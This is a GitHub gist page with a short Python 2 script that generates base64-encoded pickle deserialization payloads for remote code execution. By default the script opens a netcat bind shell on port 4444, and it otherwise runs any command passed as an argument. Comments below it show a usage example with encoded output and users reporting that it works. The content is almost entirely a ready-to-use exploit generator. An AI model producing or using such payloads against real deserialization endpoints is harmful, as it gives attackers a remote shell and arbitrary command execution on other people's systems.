Skip to content

Instantly share code, notes, and snippets.

@mgeeky

mgeeky/pickle-payload.py

Last active Jun 7, 2021
Star
Embed
What would you like to do?
Learn more about clone URLs
Download ZIP
Python's Pickle Remote Code Execution payload template.
Raw
pickle-payload.py
#!/usr/bin/python
#
# Pickle deserialization RCE payload.
# To be invoked with command to execute at it's first parameter.
# Otherwise, the default one will be used.
#
import cPickle
import sys
import base64
DEFAULT_COMMAND = "netcat -c '/bin/bash -i' -l -p 4444"
COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND
class PickleRce(object):
def __reduce__(self):
import os
return (os.system,(COMMAND,))
print base64.b64encode(cPickle.dumps(PickleRce()))
@mgeeky

This comment has been minimized.

Sign in to view
Copy link
Owner Author

@mgeeky mgeeky commented Aug 31, 2018

Usage example:

C:\Users\pickle> python D:\devel\pickle.py "uname -a"
Y250CnN5c3RlbQpwMQooUyd1bmFtZSAtYScKcDIKdFJwMwou
@Anon-Exploiter

This comment has been minimized.

Sign in to view
Copy link

@Anon-Exploiter Anon-Exploiter commented Jul 18, 2019

Thanks much =)
@b4d7r1p

This comment has been minimized.

Sign in to view
Copy link

@b4d7r1p b4d7r1p commented May 25, 2021

Worked like a charm. How would this change in python3 though?
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment